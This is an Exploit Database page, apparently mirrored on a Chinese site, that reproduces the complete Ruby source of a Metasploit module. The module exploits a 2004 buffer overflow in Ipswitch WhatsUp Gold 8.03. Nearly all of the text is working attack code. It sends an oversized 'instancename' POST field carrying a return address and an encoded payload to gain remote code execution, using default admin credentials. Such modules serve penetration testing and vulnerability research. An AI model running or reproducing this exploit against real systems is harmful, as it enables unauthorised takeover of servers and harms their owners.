IPSwitch WhatsUp Gold 8.03 – Remote Buffer Overflow (Metasploit)

• Exploit Database
• 141 阅读

• 作者： Metasploit
  日期： 2010-07-14
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/16787/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93

  ## # $Id: ipswitch_wug_maincfgret.rb 9820 2010-07-14 13:59:38Z jduck $ ##   ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ##   require &apos;msf/core&apos;   class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking   # [*] x.x.x.x WhatsUp_Gold/8.0 ( 401-Basic realm="WhatsUp Gold" ) HttpFingerprint = { :pattern => [ /WhatsUp/ ] }   include Msf::Exploit::Remote::HttpClient   def initialize(info = {}) super(update_info(info, &apos;Name&apos; => &apos;Ipswitch WhatsUp Gold 8.03 Buffer Overflow&apos;, &apos;Description&apos;=> %q{ This module exploits a buffer overflow in IPswitch WhatsUp Gold 8.03. By posting a long string for the value of &apos;instancename&apos; in the _maincfgret.cgi script an attacker can overflow a buffer and execute arbitrary code on the system. }, &apos;Author&apos; => [ &apos;MC&apos; ], &apos;License&apos;=> MSF_LICENSE, &apos;Version&apos;=> &apos;$Revision: 9820 $&apos;, &apos;References&apos; => [ [&apos;CVE&apos;, &apos;2004-0798&apos;], [&apos;OSVDB&apos;, &apos;9177&apos;], [&apos;BID&apos;, &apos;11043&apos;], ], &apos;DefaultOptions&apos; => { &apos;EXITFUNC&apos; => &apos;thread&apos;, }, &apos;Privileged&apos; => true, &apos;Payload&apos;=> { &apos;Space&apos;=> 500, &apos;BadChars&apos; => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c", &apos;PrependEncoder&apos; => "\x81\xc4\xff\xef\xff\xff\x44", }, &apos;Platform&apos; => &apos;win&apos;, &apos;Targets&apos;=> [ [ &apos;WhatsUP Gold 8.03 Universal&apos;, { &apos;Ret&apos; => 0x6032e743 } ], # whatsup.dll ], &apos;DefaultTarget&apos;=> 0, &apos;DisclosureDate&apos; => &apos;Aug 25 2004&apos;))   register_options( [ Opt::RPORT(80), OptString.new(&apos;HTTPUSER&apos;, [ false, &apos;The username to authenticate as&apos;, &apos;admin&apos;]), OptString.new(&apos;HTTPPASS&apos;, [ false, &apos;The password to authenticate as&apos;, &apos;admin&apos;]), ], self.class ) end   def exploit c = connect   num = rand(65535).to_s user_pass = "#{datastore[&apos;HTTPUSER&apos;]}" + ":" + "#{datastore[&apos;HTTPPASS&apos;]}"   req = "page=notify&origname=&action=return&type=Beeper&instancename=" req<< rand_text_alpha_upper(811, payload_badchars) + "\xeb\x06" req<< make_nops(2) + [target.ret].pack(&apos;V&apos;) + make_nops(10) + payload.encoded req<< "&beepernumber=&upcode=" + num + "*&downcode="+ num + "*&trapcode=" + num + "*&end=end"   print_status("Trying target %s..." % target.name) res = send_request_cgi({ &apos;uri&apos;=> &apos;/_maincfgret.cgi&apos;, &apos;method&apos; => &apos;POST&apos;, &apos;content-type&apos; => &apos;application/x-www-form-urlencoded&apos;, &apos;data&apos; => req, &apos;headers&apos;=> { &apos;Authorization&apos; => "Basic #{Rex::Text.encode_base64(user_pass)}" } }, 5)   handler end   end